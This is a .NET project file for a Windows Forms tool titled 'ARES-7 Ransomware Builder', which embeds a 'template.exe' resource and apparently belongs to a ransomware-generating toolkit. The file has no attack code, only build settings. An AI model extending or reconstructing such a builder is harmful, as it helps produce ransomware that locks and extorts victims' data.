<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <TargetFramework>net48</TargetFramework>
    <UseWindowsForms>true</UseWindowsForms>
    <AssemblyTitle>ARES-7 Ransomware Builder</AssemblyTitle>
    <AssemblyDescription>v6.0 C++ Builder</AssemblyDescription>
    <RootNamespace>RansomwareBuilder</RootNamespace>
  </PropertyGroup>
  <ItemGroup>
    <EmbeddedResource Include="template.exe" />
  </ItemGroup>
</Project>
